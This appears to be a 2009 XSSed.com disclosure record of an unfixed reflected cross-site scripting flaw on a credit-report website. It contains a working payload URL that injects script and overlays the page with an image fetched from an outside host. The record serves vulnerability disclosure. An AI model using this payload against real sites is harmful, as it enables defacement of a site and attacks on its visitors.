Unfixed XSS vulnerability at www.americancreditreport.com

2009-03-18T00:00:00
ID XSSED:58981
Type xssed
Reporter KvK
Modified 2009-05-07T00:00:00

Description

Security researcher KvK submitted a cross-site scripting (XSS) vulnerability affecting www.americancreditreport.com on 18/03/2009. At the time of submission, the site ranked 0 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 05/07/2009. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.americancreditreport.com/display.cfm?s="><script>1%3D1%3B</script><div_style%3D"background%3A_%23000_url(http%3A//hzh4xx.700megs.com/xss.png)center_no-repeat%3B_height%3A_100%25%3B_width%3A_100%25%3B_position%3Afixed%3B_left%3A0px%3B_top%3A0px%3B"></div><script>alert('KvK__^^')%3B</script>&pt=2&sp=2&ppc=%2BqWEgB7wUAc%3D&qs=06oENya4ZGJbKUjvjwGtnG1Krbkuoq0aidglwLmUXuLC7fJJAJ7UhLc-M86H4DLTgWKhdgkw8lJFM4h0VaEZoD-2bdpmOjskV2et3l5Qpk4gPDd7VmJ9j5rlvNNR7nBnYsb1N99F-do05eITj4MRpW4WD21SXB48jveNLCNQYnKbTrq4ZgzvMYF3SdyRoAICzuV0rULBT1jKZJmKKKAZfEayJkoLC8Pdc33dOT1tVeMu2xiD_qKg..,YT0z&vid=1237358561_7X02X178854835&rpt=1&lpt=1237358561&bd=-5%23768%231024%231%230%23858%23104&kt=1